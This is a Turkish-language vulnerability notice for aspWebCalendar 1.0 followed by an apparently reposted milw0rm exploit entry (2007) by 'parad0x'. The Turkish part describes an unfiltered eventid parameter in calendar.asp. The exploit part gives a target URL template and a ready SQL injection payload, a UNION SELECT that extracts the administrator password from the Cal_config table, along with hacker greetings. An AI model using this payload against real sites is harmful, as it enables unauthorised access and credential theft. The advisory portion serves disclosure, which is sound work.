parad0x tarafından rapor edilen güvenlik açığı SQL sorgularında değişiklik yapılabilmesine izin veriyor.

calendar.aspⁱ dosyasındaki eventid parametresine gönderilen girişler, eğer action viewevent olarak set edilmişse, SQL sorgularında kullanılmadan önce doğru olarak filtrelenmiyor. Bu sayede SQL sorgularında değişiklik yaparak SQL kodları çalıştırmak mümkün olabiliyor. Örnek olarak bu açıktan yararlanarak administrator şifresi ele geçirilebiliyor.

Açığın 1.0 sürümünde olduğu rapor edildi fakat diğer sürümler de etkileniyor olabilir.

Kaynak: http://secunia.com/advisories/24622/
Ref: http://milw0rm.com/exploits/3546
Ref2: http://secunia.com/advisories/12651/

*******************************************************************************
# Title : aspWebCalendar Remote SQL Injectionⁱ Vulnerability
# Author : parad0x
# Contact : :(
# D.Page : http://www.scriptdungeon.com/script.phpⁱ?ScriptID=4306
# $$ : free
#S.Page : http://fullrevolution.com
*******************************************************************************
http://[target]/[path]/calendar.asp?action=viewevent&eventid=[SQL]

Example:

/calendar.asp?action=viewevent&eventid=-1%20union%20select%200,Cal_ConfigId,Cal_ConfigAdminPassword,3,4,5,6,7,8,9%20from%20Cal_config

"""""""""""""""""""""
greetz : VoLqaN, x-MastER,Ekin0x,xoron

"""""""""""""""""""""
www.p4r4d0x.com

# milw0rm.com [2007-03-22]